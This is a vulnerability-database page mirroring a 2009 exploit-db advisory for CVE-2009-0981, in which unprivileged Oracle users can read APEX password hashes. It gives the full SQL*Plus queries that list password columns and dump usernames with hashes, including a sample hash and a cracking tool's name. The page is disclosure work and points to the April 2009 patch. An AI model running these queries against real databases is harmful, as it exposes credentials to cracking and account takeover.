Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes

🗓️ 16 Apr 2009 00:00:00Reported by Alexander KornbrustType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 61 Views

Unprivileged DB users can view APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes
16 Apr 200900:00
zdt
Circl		CVE-2009-0981
16 Apr 200900:00
circl
Check Point Advisories		Oracle Database Application Express Component APEX Password Hash Disclosure (CVE-2009-0981)
9 Aug 201000:00
checkpoint_advisories
CVE		CVE-2009-0981
15 Apr 200910:00
cve
Cvelist		CVE-2009-0981
15 Apr 200910:00
cvelist
exploitpack		Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes
16 Apr 200900:00
exploitpack
NVD		CVE-2009-0981
15 Apr 200910:30
nvd
Oracle		cpuapr2009.html
14 Apr 200900:00
oracle
Tenable Nessus		Oracle Application Express (Apex) CVE-2009-0981
20 Feb 201300:00
nessus
Tenable Nessus		Oracle Database Multiple Vulnerabilities (April 2009 CPU)
16 Nov 201100:00
nessus
Rows per page
Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]

Name 			Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]
Systems Affected 	APEX 3.0 (optional component of 11.1.0.7 installation)
Severity 		High Risk
Category 		Password Disclosure
Vendor URL 		http://www.oracle.com/
Author 			Alexander Kornbrust (ak at red-database-security.com)
CVE 			CVE-2009-0981
Advisory 		14 April 2009 (V 1.00)


Details
Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.
Tested on 11.1.0.7.

C:\> sqlplus dummy/dummy
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
------------------------------
CONNECT


SQL> select owner,table_name from all_tables where owner='FLOWS_030000';

OWNER TABLE_NAME
------------------------------ ------------------------------
FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE



Get a list of all columns containing the string "%PASSWORD%'

SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';

OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
--------------------------------------------------------------------------------
FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE

9 rows selected.


SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS

USER_NAME WEB_PASSWORD2
--------------------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.


Patch Information
Apply the patches for Oracle CPU April 2009.


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

# milw0rm.com [2009-04-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Apr 2009 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24
EPSS0.32845
oracle apex 3.2password disclosurehigh riskdatabase userssecurity advisorypatch informationrepscan tooloracle cpu april 2009cve-2009-0981
61